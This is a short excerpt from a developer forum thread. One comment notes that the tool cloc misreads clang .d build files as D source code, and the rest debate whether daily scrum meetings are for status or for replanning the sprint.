                                                                                                                                              Also cloc just guesses based on file extension. I have a project I check with it which has a bunch of intermediate .d clang build files, and if I don’t clean those out first it thinks I’m writing loads of D. But otherwise in terms of actual counting and speed cloc seems pretty good fir me anyway.

                                                                                                                                          1. 0

                                                                                                                                            Don’t treat them like a status meeting. They are meant to be a mini sprint planner. They are for replanning the sprint daily. See “Daily Scrum” in http://www.scrumbook.org/

                                                                                                                                            1. 1

                                                                                                                                              How do you “replan the sprint” without understanding the status of open tasks?

                                                                                                                                              Basically, your current status is the input to replanning—are you done with that task that was planned to take 3 days after only 1 day? Better pull something else into the sprint!

                                                                                                                                              1. 0

                                                                                                                                                You are correct that status is important for planning. I agree and didn’t say status isn’t involved, or isn’t important, just pointing out it isn’t the goal of the meeting. As I said, they are not status meetings but planning meetings.